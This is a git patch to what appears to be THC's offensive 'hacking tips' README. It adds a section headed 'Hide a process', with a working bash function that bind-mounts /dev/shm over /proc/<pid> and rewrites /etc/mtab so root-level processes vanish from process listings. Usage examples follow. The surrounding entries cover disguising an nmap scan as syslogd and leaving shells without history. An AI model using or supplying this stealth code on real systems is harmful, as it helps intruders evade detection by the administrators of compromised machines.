From 286276fcfc4ae4cdb9c5afb7ba50ca0fc8c8c17b Mon Sep 17 00:00:00 2001
From: SkyperTHC <5938498+SkyperTHC@users.noreply.github.com>
Date: Sun, 28 Aug 2022 01:30:47 +0100
Subject: [PATCH] hide
---
README.md | 26 ++++++++++++++++++++++++++
1 file changed, 26 insertions(+)
diff --git a/README.md b/README.md
index 1b213d8..8df5d98 100644
--- a/README.md
+++ b/README.md
@@ -10,6 +10,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
1. [Leave Bash without history](#lbwh-anchor)
1. [Hide your command](#hyc-anchor)
1. [Hide your arguments](#hya-anchor)
+ 1. [Hide a process](#hide-a-process)
1. [SSH](#ais-anchor)
1. [Almost invisible SSH](#ais-anchor)
1. [SSH tunnel OUT](#sto-anchor)
@@ -120,6 +121,31 @@ LD_PRELOAD=./zap-args.so exec -a syslogd nmap -T0 10.0.0.1/24
```
Note: There is a gdb variant as well. Anyone?
+
+**1.iv. Hide a process**
+
+This requires ```root`` privileges and is an old Linux trick by over-mounting /proc/<pid> with a useless directory:
+```sh
+hide()
+{
+ [[ -L /etc/mtab ]] && { cp /etc/mtab /etc/mtab.bak; mv /etc/mtab.bak /etc/mtab; }
+ _pid=${1:-$$}
+ [[ $_pid =~ ^[0-9]+$ ]] && { mount -n --bind /dev/shm /proc/$_pid && echo "[THC] PID $_pid is now hidden"; return; }
+ local _argstr
+ for _x in "${@:2}"; do _argstr+=" '${_x//\'/\'\"\'\"\'}'"; done
+ [[ $(bash -c "ps -o etimes= -p \$PPID") -eq 0 ]] && exec bash -c "mount -n --bind /dev/shm /proc/\$\$; exec \"$1\" $_argstr"
+ bash -c "mount -n --bind /dev/shm /proc/\$\$; exec \"$1\" $_argstr"
+}
+```
+
+The use this to hide a command:
+```sh
+hide # Hides the current shell/PID
+hide 31337 # Hides process with pid 31337
+hide sleep 1234 # Hides 'sleep 1234'
+hide nohup sleep 1234 &>/dev/null & # Starts and hides the hidden background process 'sleep 1234'
+```
+
---
**2.i. Almost invisible SSH**